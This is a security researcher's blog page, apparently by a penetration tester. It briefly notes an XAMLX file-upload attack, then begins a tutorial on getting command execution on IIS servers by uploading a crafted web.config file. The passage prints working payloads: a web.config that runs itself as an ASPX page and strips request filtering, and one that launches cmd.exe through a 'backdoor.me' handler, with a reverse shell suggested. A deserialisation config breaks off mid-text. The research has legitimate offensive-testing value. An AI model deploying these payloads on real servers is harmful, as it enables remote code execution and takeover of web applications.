soroush.secproject.comSoroush Dalili (@irsdl) – سروش دلیلی | Web AppSec ninja, a semicolon enthusiast!

Soroush Dalili (@irsdl) – سروش دلیلی Web AppSec ninja, a semicolon enthusiast! Menu Skip to content Home Advisories Privacy Policy File Upload Attack using XAMLX Files I have recently published a blog post on use of .XAMLX files to execute command on an IIS based application. This blog has been has been published by NCC and is accessible here: https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/august/getting-shell-with-xamlx-files/ Here is its little Twitter story: And here we go https://t.co/KTVukFkFn6 – that was fast @NCCGroupInfosec ! Thanks :) — Soroush Dalili (@irsdl) August 23, 2019 This technique can come in handy when dealing with a file uploader that uses a blacklist approach to stop malicious extensions. Interestingly, if you just search XAMLX in Google or Bing , this technique will be in the first page so it has taken over so many of its actual legitimate usage! This entry was posted in Security Posts and tagged file upload , file upload bypass , file uploader security bypass , IIS File Extension Security Bypass , Unrestricted File Upload , xaml , xamlx on September 21, 2019 by Soroush Dalili . Uploading web.config for Fun and Profit 2 Table of Contents: Introduction 1. Execute command using web.config in the root or an application directory 1.1. Executing web.config as an ASPX page 1.2. Running command using AspNetCoreModule 1.3. Using Machine Key 1.4. Using JSON_AppService.axd 2. Execute command using web.config in a subfolder/virtual directory 2.1. Abusing the compilerOptions attribute 2.1.1. Creating a web shell 2.1.2. Taking over existing ASPX files 2.1.3. Stealing internal files 2.1.4. Stealing more data about the app 2.2. Taking over existing/uploaded .NET files 2.3. Stored XSS 2.3.1. Using StateApplication hanlder 2.3.2. Using DiscoveryRequestHandler hanlder 3. Prevention techniques 4. Behind the scene 4.1. Requirements and resources 4.2. Compiler options 4.3. Exploring new handlers 4.3.1. Handlers limit in a subfolder 4.4. Temporary and compiled files 5. References Introduction This is the second part of my Uploading web.config For Fun and Profit! I wrote the original blog post back in 2014 [1] in which I had described a method to run ASP classic code as well as performing stored XSS attacks only by uploading a web.config file. In this blog post, as well as focusing on running the web.config file itself, I have covered other techniques that can come in handy when uploading a web.config in an application on IIS. My main goal is to execute code or commands on the server using a web.config file and have added more techniques for stored XSS as well. The techniques described here have been divided into two major groups depending on whether a web.config file can be uploaded in an application root or in a subfolder/virtual directory. Please see [2] if you are not familiar with virtual directory and application terms in IIS. Another blog post of mine can also be helpful to identify a virtual directory or an application during a blackbox assessment [3] . 1. Execute command using web.config in the root or an application directory This method can be very destructive where an application already uses a web.config file that is going to be replaced with ours which might not have all the required settings such as the database connection string or some valid assembly references. It is recommended to not use this technique on live websites when an application might have used a web.config file which is going to be replaced. IIS applications that are inside other applications or virtual directories might not use a web.config file and are generally safer candidates than website’s root directory. The following screenshot shows an example of an internal application anotherapp inside the testwebconfig application which is also inside the Default Web Site . There are many methods that can be used to execute commands on a server if the web.config file within the root directory of an application can be modified. I have included four interesting examples in this blog posts which are as follows. 1.1. Executing web.config as an ASPX page This is very similar to [1] but as we are uploading a web.config file within the root directory of an application, we have more control and we can use the managed handlers to run a web.config file as an ASPX page. The following web.config file shows an example: <?xml version="1.0" encoding="UTF-8"?> <configuration> <system.webServer> <handlers accessPolicy="Read, Script, Write"> <add name="web_config" path="web.config" verb="*" type="System.Web.UI.PageHandlerFactory" modules="ManagedPipelineHandler" requireAccess="Script" preCondition="integratedMode" /> <add name="web_config-Classic" path="web.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\Microsoft.NET\Framework64\v4.0.30319\aspnet_isapi.dll" requireAccess="Script" preCondition="classicMode,runtimeVersionv4.0,bitness64" /> </handlers> <security> <requestFiltering> <fileExtensions> <remove fileExtension=".config" /> </fileExtensions> <hiddenSegments> <remove segment="web.config" /> </hiddenSegments> </requestFiltering> </security> <validation validateIntegratedModeConfiguration="false" /> </system.webServer> <system.web> <compilation defaultLanguage="vb"> <buildProviders> <add extension=".config" type="System.Web.Compilation.PageBuildProvider" /> </buildProviders> </compilation> <httpHandlers> <add path="web.config" type="System.Web.UI.PageHandlerFactory" verb="*" /> </httpHandlers> </system.web> </configuration> <!-- ASP.NET code comes here! It should not include HTML comment closing tag and double dashes! <% Response.write("-"&amp;"->") ' it is running the ASP code if you can see 3 by opening the web.config file! Response.write(1+2) Response.write("<!-"&amp;"-") %> --> It is then possible to browse the web.config file to run it as an ASP.NET page. Obviously the XML contents will also be accessible from the web. Perhaps it is just easier to upload another file with an allowed extension such as a .config , .jpg or .txt file and run that as a .aspx page. 1.2. Running command using AspNetCoreModule It is also possible to run a command using the ASP.NET Core Module as shown below: <?xml version="1.0" encoding="utf-8"?> <configuration> <system.webServer> <handlers> <remove name="aspNetCore" /> <add name="aspNetCore" path="backdoor.me" verb="*" modules="AspNetCoreModule" resourceType="Unspecified" /> </handlers> <aspNetCore processPath="cmd.exe" arguments="/c calc"/> </system.webServer> </configuration> The stated command would be executed by browsing the backdoor.me page which does not need to exist on the server! A PowerShell command can be used here as an example for a reverse shell. 1.3. Using Machine Key As described in [4] , the machineKey element can be set in the web.config file in order to abuse a deserialisation feature to run code and command on the server. 1.4. Using JSON_AppService.axd This is a sneaky way of running code on the server using a known deserialisation issue within an authentication process in .NET Framework (see [5] for more information). In this case, the web.config file can look like this: <?xml version="1.0" encoding="UTF-8"?> <configuration> <system.web.extensions> <scripting> <webServices> <authenticationService enabled="true" requireSSL="false" /> </webServices> </scripting> </system.web.extensions> <appSettings> <add key="aspnet:UseLegacyClientServicesJsonHandling" value="true" /> </appSettings> <system.web> <membership defaultProvider="ClientAuthenticationMembershipProvider"> <providers> <add name="ClientAuthenticationMembershipProvider" type="System.Web....